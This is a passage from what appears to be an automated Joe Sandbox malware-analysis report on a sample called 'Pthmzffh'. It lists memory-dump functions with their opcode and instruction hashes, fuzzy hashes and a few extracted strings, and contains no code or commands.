                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7e3738919edb39acd934c69ebda65e132e56aff2ebcee1497074e002e5998952
                                                                      • Instruction ID: d9a81193d94c360cd429eb92bb6f48ae8d270b086e493c17b363195584481dfd
                                                                      • Opcode Fuzzy Hash: 7e3738919edb39acd934c69ebda65e132e56aff2ebcee1497074e002e5998952
                                                                      • Instruction Fuzzy Hash: E9C09B75610400AFC280C754C89A987F7D1EF9D245B56C45DD4098B215DB32D947D754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A3DC08 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A315A0 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A36DA8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A3D6E0 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A34EE8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A358E8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A37830 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A34A88 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A3CAD0 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A39B18 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BD2E8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BD2D8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 595cb506b041e663c42690b4b2a2beb3a1bf187a0797531df270680089ca77df
                                                                      • Instruction ID: 70130b8d39cd36a7fb53b120fbcb9a926191449a9ed049872a9e7de1e6c201ff
                                                                      • Opcode Fuzzy Hash: 595cb506b041e663c42690b4b2a2beb3a1bf187a0797531df270680089ca77df
                                                                      • Instruction Fuzzy Hash: 86B0929412EF800FE36642101AD60C3BF60E9822047A648AAC0C3870A3E000831B835B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BCA78 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction ID: 60a72056a403d9f31dd85fef4a7a76d12bb133d0d450fb6ef353260f5a4d9492
                                                                      • Opcode Fuzzy Hash: 16581dba91a5fda841cf47983153eb36e4fc24851952f78b75638f70de6cde10
                                                                      • Instruction Fuzzy Hash: 0BC09274300100AF8348CA18C895C26F7E6EFD8214B24C46DB84DC7365EF32EC03CA10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A7AA30 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520525715.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a70000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f10ec0b877a65971179edafba6d42bf6e6c4f08e203db120c09209d3059b5175
                                                                      • Instruction ID: 5980753f6973aab9e451b72c71784a732fb9df1adc7c1495e7b986a958dc8aa8
                                                                      • Opcode Fuzzy Hash: f10ec0b877a65971179edafba6d42bf6e6c4f08e203db120c09209d3059b5175
                                                                      • Instruction Fuzzy Hash: ACB092C690E78156FE0123A6582036A15DAEB96135B9B03D506F1851D1E948E8451019
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A30450 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A32FD0 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A309E0 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B5750 Relevance: .0, Instructions: 5COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                                                      • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                                                      • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04A330A2 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.520356796.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_4a30000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                      • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B1A80 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                      • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BDB12 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                      • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022B78A2 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                      • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 022BA9E2 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.516950457.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_22b0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                                      • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                                      • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Function 0C5FC438 Relevance: 4.9, Strings: 3, Instructions: 1111COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.524919834.000000000C5F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C5F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c5f0000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4$Xc'm$Xc'm
                                                                      • API String ID: 0-95617288
                                                                      • Opcode ID: 1369ed879fee1238fbe7932fbe236deb563018bcc1d3b7aca45ab8111b591143
                                                                      • Instruction ID: 0e8be0a6d70ad926c7fde50aeb5607a7c92f7b45f00fa75b8e941ff38dc9bd3e
                                                                      • Opcode Fuzzy Hash: 1369ed879fee1238fbe7932fbe236deb563018bcc1d3b7aca45ab8111b591143
                                                                      • Instruction Fuzzy Hash: 2AB2FA38B001188FDB28DF98C994B9DB7B6BF48700F1585A5E906AB365DB30ED86CF51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71CF70 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `&m
                                                                      • API String ID: 0-1811436473
                                                                      • Opcode ID: f9052d8e62ccdd5f05ec08760e70fff025d634957545e4bfd3961d4e3f1b732b
                                                                      • Instruction ID: 64361784b091dac5804b429e3fe0cb10dee22171bdafd6bb5cd60473c4e6ad8b
                                                                      • Opcode Fuzzy Hash: f9052d8e62ccdd5f05ec08760e70fff025d634957545e4bfd3961d4e3f1b732b
                                                                      • Instruction Fuzzy Hash: FBA1A231B101299FC715EB6DD894A6FB3A3FFD8614F1A8164D805DB389DF74AC028B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71B098 Relevance: .3, Instructions: 301COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 37a8e821ca000e3ebca260cfd100160452f606b565b99a3d5aad402ff30b6dcb
                                                                      • Instruction ID: 0edeefb1faacb736cb75feda6e03bf64248e0f71c4570d3eacc5411a49acb0b3
                                                                      • Opcode Fuzzy Hash: 37a8e821ca000e3ebca260cfd100160452f606b565b99a3d5aad402ff30b6dcb
                                                                      • Instruction Fuzzy Hash: 49D15AB4E05219CFDB14DF69D890BAEB7F2FB88310F14859AD81AAB344CB349945CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71B1EA Relevance: .2, Instructions: 248COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d9d0a75a3c5c258ae185a242a747eca1793ce0735d0d6d90a255449deeb5a0a5
                                                                      • Instruction ID: 62c3a66009da5cf9b50db351b5ef8574a8d25d26f9d16ed131d6f2206df2397d
                                                                      • Opcode Fuzzy Hash: d9d0a75a3c5c258ae185a242a747eca1793ce0735d0d6d90a255449deeb5a0a5
                                                                      • Instruction Fuzzy Hash: 74A15B35A11129DFDB05EF69E8986BEB7F3FB8C316F048559E805AB348CB346D058B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C71D081 Relevance: .2, Instructions: 216COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 11de71f5790c68594efdb65af32248b34f53b2a3e8f9af4764d6c7f0a1f80cc8
                                                                      • Instruction ID: 5a518d1e37ad3621c1296a61988fcb51d1901aa3ce9086ad3a79dfacdf4cd1ef
                                                                      • Opcode Fuzzy Hash: 11de71f5790c68594efdb65af32248b34f53b2a3e8f9af4764d6c7f0a1f80cc8
                                                                      • Instruction Fuzzy Hash: E2716E32F111298FD715EB69D890A6EB2A3FFC8614F1A8164D805DB799DF74AC028B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0C719F52 Relevance: 4.0, Strings: 3, Instructions: 232COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.525219612.000000000C710000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C710000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_c710000_Pthmzffh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \"m$hC'm$g'm
                                                                      • API String ID: 0-4096876852
